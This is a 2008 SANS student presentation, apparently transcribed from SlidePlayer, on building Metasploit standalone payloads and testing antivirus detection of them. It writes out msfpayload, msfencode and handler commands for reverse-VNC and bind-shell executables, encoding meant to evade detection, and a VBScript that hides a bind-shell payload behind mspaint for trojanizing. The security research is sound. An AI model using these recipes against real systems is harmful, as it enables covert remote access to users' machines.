Download presentation
Presentation is loading. Please wait.
Published byLouisa Davidson Modified over 9 years ago
1
1 SANS Technology Institute - Candidate for Master of Science Degree 1 Metasploit Payloads and Antivirus Mark Baggett December 2008 GIAC GSEC GCIH
2
SANS Technology Institute - Candidate for Master of Science Degree 2 Objectives Learn how an attacker might use Metasploit standalone payloads against you See how these payloads are created, used and “trojanized” Understand what level of protection to expect from your antivirus
3
SANS Technology Institute - Candidate for Master of Science Degree 3 How are they used against you? Can be executed by tricking a user into running the payload or via an exploit that is not in the framework Execute a payload on a fully patched system Use Meterpreter’s advanced functionality such as anti-forensics, detection evasion, and pivoting Scenario: –Attacker bruteforces password to a fully patched machine –Runs Meterpreter payload and uses it to pivot –Uses framework to attack other hosts on DMZ
4
SANS Technology Institute - Candidate for Master of Science Degree 4 msfpayload Generates payloads in various formats –Source code in C, Perl, Ruby, Java –Hexadecimal (RAW) –Binary executable formats for Win32; Linux; OS X on Intel, PPC, iPhone –Java automatically selects Big Endian or Little Endian depending upon processor of targeted payload –You can override this with a simple modification to msfpayload (js_be, js_le)
5
SANS Technology Institute - Candidate for Master of Science Degree 5 Demonstration See how these payloads are created
6
SANS Technology Institute - Candidate for Master of Science Degree 6 Interacting with payloads Some payloads will not work standalone –find_port, find_tag Bind shell payloads can be used outside of the framework Others require the use of the multi/handler exploit
7
SANS Technology Institute - Candidate for Master of Science Degree 7 Using multi/handler./msfcli exploit/multi/handler \ PAYLOAD=windows/vncinject/reverse_tcp \ RHOST=192.168.100.3 \ DisableCourtesyShell=TRUE E./msfpayload \ windows/vncinjection/reverse_tcp \ LHOST=192.168.100.5 X > vncrev.exe CREATION - LHOST is the attacker’s IP USE - RHOST is the victim’s IP
8
SANS Technology Institute - Candidate for Master of Science Degree 8 Demonstration See how these payloads are used
9
SANS Technology Institute - Candidate for Master of Science Degree 9 msfencode Will encode a payload using one of various algorithms Expects RAW msfpayload as input -h for help -l list of available encoders -e encoder to use -t output type -b characters to avoid
10
SANS Technology Institute - Candidate for Master of Science Degree 10 msfencode -> Binary Binary was not a selectable output type from msfencode until Sept 29 th 2008 3 ways to create a binary –Add 3 lines of code to msfencode –Generate RAW output and use a hex editor to place it in a binary PE format –Generate C source code and compile it -t exe option will encode a Windows binary
11
SANS Technology Institute - Candidate for Master of Science Degree 11 msfencode (continued)./msfpayload windows/shell_bind_tcp R |\./msfencode -e x86/shikata_ga_nia -t exe./msfpayload windows/shell_bind_tcp R |\./msfencode -e x86/shikata_ga_nia –b\ “\x41\x42\x43” -t exe Text.to_win32pe() uses /data/templates –Use your own binaries with “PAYLOAD:” tag –To_win32pe chooses a random base relocation address (4 bytes at position 0x88) –Roll your own with template.c
12
SANS Technology Institute - Candidate for Master of Science Degree 12 Turning payloads into trojans IExpress is a setup utility that comes with Windows XP Can create packages that visibly execute a benign host program and invisibly execute a malicious payload All you need is a small VBscript to execute your payload invisibly Trojan payloads only temporarily avoid antivirus
13
SANS Technology Institute - Candidate for Master of Science Degree 13 Payload script The script Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "mspaint.exe",1, False Wshshell.Run "bindshell.exe",0, False Quick IExpress Demonstration –See how these payloads are “trojanized”
14
SANS Technology Institute - Candidate for Master of Science Degree 14 Level of protection to expect from your antivirus Expected results: Low rate of detection for unencoded payloads and no detection for encoded payloads Actual results: No detection for unencoded payloads or encoded payloads 2 products’ heuristics flagged payloads Pauldotcom Episode 125 at the end of September 2008 found 6 systems detected the payload My HIPS testing yielded disappointing results HD Moore has stated that version 3.2 will generate a new Windows Binary that is harder to detect.
15
SANS Technology Institute - Candidate for Master of Science Degree 15 Summary Metasploit is a powerful framework with a diverse set of tools Using these tools attackers can easily create standalone payloads that run on fully patched systems Antivirus products do not at this time provide adequate protection against Metasploit payloads My paper is in the SANS reading room titled “Effectiveness of Antivirus Detecting Metasploit Payloads”
Similar presentations
© 2024 SlidePlayer.com Inc.
All rights reserved.